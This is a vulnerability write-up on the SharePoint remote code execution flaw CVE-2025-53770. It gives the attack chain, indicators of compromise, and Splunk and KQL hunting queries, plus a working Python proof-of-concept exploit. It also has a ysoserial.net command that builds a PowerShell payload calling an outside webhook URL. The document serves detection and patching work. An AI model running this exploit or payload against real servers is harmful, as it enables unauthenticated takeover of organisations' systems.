CVE-2025-53770 – Microsoft SharePoint RCE
A zero‑day remote code execution vulnerability in Microsoft SharePoint (on‑premises).
Overview
In mid‑July 2025, Microsoft disclosed CVE‑2025‑53770, a zero‑day remote code execution vulnerability in on‑premises SharePoint. This flaw, when chained with CVE‑2025‑53771, enables unauthenticated attackers to fully compromise vulnerable servers over the internet.
The exploitation campaign, dubbed “ToolShell”, has been observed actively targeting governments, energy, education, and telecom sectors worldwide. If you run SharePoint Server (2016/2019/Subscription) and expose it to the internet, you need to patch now.
Impact at a glance
- Attack Vector: Remote, unauthenticated
- Impact: Full RCE (IIS worker context)
- Exploitation: Active (confirmed by MS + CISA)
- Ease: Exploitable with a single HTTP POST
Vulnerability Details
The issue lies in unsafe deserialization of crafted __VIEWSTATE data in the ToolPane.aspx component. When combined with a referer spoof (CVE‑2025‑53771), attackers can reach this endpoint without authentication, feed it a malicious payload, and gain remote code execution as the w3wp.exe (IIS worker) process.
The attack chain:
- Authentication bypass: Use
Referer: /_layouts/SignOut.aspxto bypass security checks on/layouts/15/ToolPane.aspx?DisplayMode=Edit. - Malicious ViewState: Send a signed or forged ViewState payload containing serialized gadget chains (crafted via tools like ysoserial.net).
- RCE: SharePoint deserializes the payload and executes attacker‑controlled code.
- Persistence: Attackers drop a web shell (e.g.,
spinstall0.aspx) and steal machine keys for future signed payload generation.
Visualized:
1
2
3
4
5
6
7
8
9
10
11
12
[ Attacker ]
|
v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
|
v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
|
v
[ RCE: Attacker code runs as w3wp.exe ]
Why It Matters
- No authentication required: Works from the internet if the server is exposed.
- Full takeover: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.
- Exploited in the wild: Microsoft, CISA, and Rapid7 have confirmed active exploitation in multiple regions.
Affected Versions
- SharePoint Server 2016 (before KB5002760)
- SharePoint Server 2019 (before KB5002754)
- SharePoint Subscription Edition (before KB5002768)
(SharePoint Online is not affected.)
Indicators of Compromise
- Requests to:
1
/_layouts/15/ToolPane.aspx?DisplayMode=Edit
with
Referer: /_layouts/SignOut.aspx. - Dropped files:
1 2
spinstall0.aspx spinstall1.aspx
- Suspicious process chains:
1
w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
- Known attacker IPs:
1
107.191.58.76, 104.238.159.149, 96.9.125.147
Detection & Hunting
Splunk (IIS Logs)
index=iis sourcetype="ms:iis:auto"
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time
KQL (Microsoft Sentinel)
W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, userAgent, TimeGenerated
Proof‑of‑Concept (Python)
A Python PoC is provided to test for CVE‑2025‑53770.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env python3
# CVE-2025-53770 – SharePoint Unauthenticated RCE PoC
# Author: 0xH3G4Z1
# Usage: python3 exploit.py
import requests
import urllib3
urllib3.disable_warnings()
# === CONFIG ===
TARGET = "https://your-sharepoint-server" # <--- CHANGE THIS
ENDPOINT = "/_layouts/15/ToolPane.aspx?DisplayMode=Edit"
FULL_URL = TARGET.rstrip("/") + ENDPOINT
VIEWSTATE_PAYLOAD = (
"" # <--- CHANGE THIS
)
HEADERS = {
"Referer": "/_layouts/SignOut.aspx",
"Content-Type": "application/x-www-form-urlencoded"
}
DATA = {
"__VIEWSTATE": VIEWSTATE_PAYLOAD,
"__EVENTTARGET": "",
"__EVENTARGUMENT": ""
}
def exploit():
print(f"[+] Sending payload to {FULL_URL}")
try:
r = requests.post(FULL_URL, headers=HEADERS, data=DATA, verify=False, timeout=10)
print(f"[+] Response: {r.status_code} ({len(r.content)} bytes)")
if r.status_code == 200:
print("[+] If vulnerable, the payload was processed (check your target).")
elif r.status_code == 403:
print("[-] Access forbidden (patched or blocked).")
else:
print("[-] Exploit may not have succeeded.")
except Exception as e:
print(f"[!] Error: {e}")
if __name__ == "__main__":
exploit()
Generating a payload:
To test whether the target processes ViewState and executes commands, you can generate a callback payload with ysoserial.net.
This example makes a PowerShell web request to a Webhook.site URL you control:
1
2
ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c powershell -c "iwr 'https://webhook.site/3a5dbeec-f481-4515-b827-52c69a41b4d8'"
> payload.txt
Then replace __VIEWSTATE with the contents of payload.txt.
Mitigation & Hardening
- Patch immediately:
- Rotate machine keys (twice): Update the
machineKeyinweb.configto invalidate stolen signing keys. - Restrict access to
/layouts/15/ToolPane.aspxto internal networks only. - Enable IIS request filtering to block oversized or suspicious ViewState payloads.
- Enable Defender AV + AMSI integration for real‑time scanning of SharePoint components.
- Hunt for compromise: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.
Key Takeaways
- CVE‑2025‑53770 is being actively exploited.
- The attack is trivial once discovered (POST + spoofed Referer).
- Patching alone is not enough — rotate machine keys to invalidate stolen ViewState signing keys.
- Monitor for web shells (
spinstall0.aspx, etc.) and suspicious ToolPane.aspx requests.
References: